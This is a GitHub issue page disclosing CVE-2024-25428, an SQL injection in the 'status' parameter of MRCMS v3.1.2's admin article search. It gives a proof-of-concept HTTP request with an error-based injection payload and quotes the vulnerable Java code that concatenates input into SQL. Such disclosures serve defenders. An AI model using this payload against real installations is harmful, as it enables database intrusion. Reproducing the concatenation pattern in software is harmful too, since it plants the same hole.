We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25428
[Vulnerability Type]
SQL Injection
[Vulnerability Description]
MRCMS v3.1.2 is vulnerable to SQL Injection via the status parameter
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1¤tPageNo=1&pageSize=20
1.Select content->File management
2.Click the search button
SQL injection exists in status parameter
status
POC
GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123¤tPageNo=1&pageSize=20 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: close Referer: http://localhost:8080/admin/index.do Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java
public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) { String keyword = (String) condition.get("keyword"); String status = (String) condition.get("status"); int cid = (Integer)condition.get("cid"); int did = (Integer)condition.get("did"); int userGroupId = (Integer)condition.get("userGroupId"); // try { // keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8"); // } catch (UnsupportedEncodingException e) { // e.printStackTrace(); // } String prefix = config.getPrefix(); String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d')) url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a " + "left join "+prefix+"channel c on c.id = a.cid "; sql += "where a.status in ("+status+") "; if(userGroupId != 1){ sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") "; }
In this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the status parameter
The text was updated successfully, but these errors were encountered:
No branches or pull requests
[The name of an affected Product]
[The affected or fixed version]
[CVE ID]
CVE-2024-25428
[Vulnerability Type]
[Vulnerability Description]
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1¤tPageNo=1&pageSize=20
1.Select content->File management
2.Click the search button
SQL injection exists in
statusparameterPOC
code discovery
Code path:
MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.javaIn this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the
statusparameterThe text was updated successfully, but these errors were encountered: